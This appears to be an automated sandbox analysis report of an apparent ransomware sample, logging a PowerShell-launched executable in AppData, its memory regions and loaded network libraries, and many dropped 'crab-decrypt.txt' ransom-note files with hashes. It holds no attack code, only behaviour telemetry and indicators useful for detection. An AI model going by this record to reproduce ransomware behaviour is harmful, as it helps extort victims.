| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
2 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
2 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
2 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = PSModuleAutoLoadingPreference |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, type = file_attributes |
|
3 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Desktop, type = file_attributes |
|
1 | |
| Process | Create | process_name = C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe, show_window = SW_SHOWNORMAL |
|
1 |
Thread 0xf70
30
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
147 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 |
Thread 0xf98
30
0
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
60 | |
| System | Sleep | duration = 0 milliseconds (0.000 seconds) |
|
1 |
Process #6: roamingqtp35.exe
4721
24
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\nd9e1fyi\appdata\roamingqtp35.exe |
| Command Line | "C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe" |
| Initial Working Directory | C:\Users\Nd9E1FYi\Desktop\ |
| Monitor | Start Time: 00:00:39, Reason: Child Process |
| Unmonitor | End Time: 00:03:23, Reason: Terminated by Timeout |
| Monitor Duration | 00:02:44 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfd8 |
| Parent PID | 0xe98 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | X2VS1CUM\Nd9E1FYi |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
FDC
0x
FE0
0x
B24
0x
D48
0x
C84
0x
454
0x
740
0x
2C8
0x
618
0x
E90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00054fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00060fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0006ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00067fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x00090fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00185fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000170000 | 0x00170000 | 0x00177fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00170fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000180000 | 0x00180000 | 0x00181fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001f5fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| roamingqtp35.exe | 0x00400000 | 0x0044afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000450000 | 0x00450000 | 0x00450fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000460000 | 0x00460000 | 0x0055ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00560000 | 0x0061dfff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000620000 | 0x00620000 | 0x0062ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000630000 | 0x00630000 | 0x0066ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0076ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000770000 | 0x00770000 | 0x008f7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000900000 | 0x00900000 | 0x00a80fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000a90000 | 0x00a90000 | 0x01e8ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01eb3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01f1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001e90000 | 0x01e90000 | 0x01ecffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ed0000 | 0x01ed0000 | 0x01ed0fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001ed0000 | 0x01ed0000 | 0x01ed0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x01ee0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001ef0000 | 0x01ef0000 | 0x01ef0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f00000 | 0x01f00000 | 0x01f00fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f10000 | 0x01f10000 | 0x01f1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f20000 | 0x01f20000 | 0x01f20fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f30000 | 0x01f30000 | 0x01f30fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f40000 | 0x01f40000 | 0x01f40fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f50000 | 0x01f50000 | 0x01f50fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f60000 | 0x01f60000 | 0x01f60fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f70000 | 0x01f70000 | 0x01f70fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f80000 | 0x01f80000 | 0x01f80fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001f90000 | 0x01f90000 | 0x01f9ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x020a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001fa0000 | 0x01fa0000 | 0x0209ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x020affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x020b5fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020a0000 | 0x020a0000 | 0x020a7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x020a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020b0000 | 0x020b0000 | 0x020b0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000020c0000 | 0x020c0000 | 0x020c7fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| counters.dat | 0x020c0000 | 0x020c0fff | Memory Mapped File | Readable, Writable |
|
|
|
|
| private_0x00000000020d0000 | 0x020d0000 | 0x0210ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x02112fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002110000 | 0x02110000 | 0x02127fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002120000 | 0x02120000 | 0x02122fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000002130000 | 0x02130000 | 0x02130fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000002140000 | 0x02140000 | 0x0214ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000002150000 | 0x02150000 | 0x0215ffff | Private Memory | Readable, Writable |
|
|
|
- |
| sortdefault.nls | 0x02160000 | 0x02496fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000024a0000 | 0x024a0000 | 0x0289afff | Pagefile Backed Memory | Readable |
|
|
|
- |
| ole32.dll | 0x028a0000 | 0x02989fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000028a0000 | 0x028a0000 | 0x0299ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029a0000 | 0x029a0000 | 0x029dffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000029e0000 | 0x029e0000 | 0x02adffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ae0000 | 0x02ae0000 | 0x02b1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002b20000 | 0x02b20000 | 0x02c1ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c20000 | 0x02c20000 | 0x02c20fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c30fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002c30000 | 0x02c30000 | 0x02c38fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02c85fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c40000 | 0x02c40000 | 0x02c40fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02c50fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c50000 | 0x02c50000 | 0x02c51fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002c60000 | 0x02c60000 | 0x02c60fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c70000 | 0x02c70000 | 0x02c70fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c70000 | 0x02c70000 | 0x02c73fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002c80000 | 0x02c80000 | 0x02c82fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002c80000 | 0x02c80000 | 0x02cb2fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000002c90000 | 0x02c90000 | 0x02c90fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02ca0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cb0000 | 0x02cb0000 | 0x02cb0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000002cc0000 | 0x02cc0000 | 0x02cc2fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| wow64win.dll | 0x5d0b0000 | 0x5d129fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64.dll | 0x5d130000 | 0x5d17ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wow64cpu.dll | 0x5d180000 | 0x5d187fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| urlmon.dll | 0x6f930000 | 0x6faadfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winhttp.dll | 0x6fab0000 | 0x6fb4afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wininet.dll | 0x6fb50000 | 0x6fd5cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x702b0000 | 0x702b7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ondemandconnroutehelper.dll | 0x702c0000 | 0x702d1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x702e0000 | 0x702f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x70300000 | 0x7032efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x70330000 | 0x70342fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcr100.dll | 0x70350000 | 0x7040efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| fwpuclnt.dll | 0x71770000 | 0x717b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rasadhlp.dll | 0x717c0000 | 0x717c7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x717d0000 | 0x717fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| dnsapi.dll | 0x71810000 | 0x71893fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| mswsock.dll | 0x718a0000 | 0x718eefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iertutil.dll | 0x71910000 | 0x71bdafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcrypt.dll | 0x73a50000 | 0x73a6afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x73d00000 | 0x73d91fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x73da0000 | 0x73da9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x73db0000 | 0x73dcdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| bcryptprimitives.dll | 0x741e0000 | 0x74237fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x74240000 | 0x7563efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x75640000 | 0x75645fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x75650000 | 0x75693fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x756a0000 | 0x7575dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x75780000 | 0x75811fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msasn1.dll | 0x758a0000 | 0x758adfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x758b0000 | 0x758f4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x75900000 | 0x7592afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x75bf0000 | 0x75ccffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| combase.dll | 0x75cd0000 | 0x75e8cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x75ef0000 | 0x75f9cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76110000 | 0x76256fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x76270000 | 0x762a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| powrprof.dll | 0x762b0000 | 0x762f3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x76300000 | 0x7630efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76310000 | 0x7638afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x76390000 | 0x7650dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x76510000 | 0x7656efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shcore.dll | 0x76600000 | 0x7668cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x76690000 | 0x76696fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel.appcore.dll | 0x76700000 | 0x7670bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x76710000 | 0x7685efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| crypt32.dll | 0x76860000 | 0x769d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| windows.storage.dll | 0x769e0000 | 0x76ed8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77080000 | 0x771fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffc173fffff | Private Memory | Readable |
|
|
|
- |
| ntdll.dll | 0x7ffc17400000 | 0x7ffc175c0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x00007ffc175c1000 | 0x7ffc175c1000 | 0x7ffffffeffff | Private Memory | Readable |
|
|
|
- |
|
For performance reasons, the remaining 212 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\$recycle.bin\s-1-5-21-2172869166-1497266965-2109836178-1000\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\collab\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\forms\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\jscache\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\acrobat\dc\security\crlcache\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
SHA1: 5874ddee58a8cb328e5c1f68aca5ff7178901d8a SHA256: daad50eb03aa9ae396d0223b0dec2c6ccbe4db14324ec0e03872d8fd98a79ec9 |
|
|
| c:\users\nd9e1fyi\appdata\roaming\adobe\flash player\crab-decrypt.txt | 3.62 KB |
MD5:
6a601666a0c7a954c5dcc81b4f476e2f
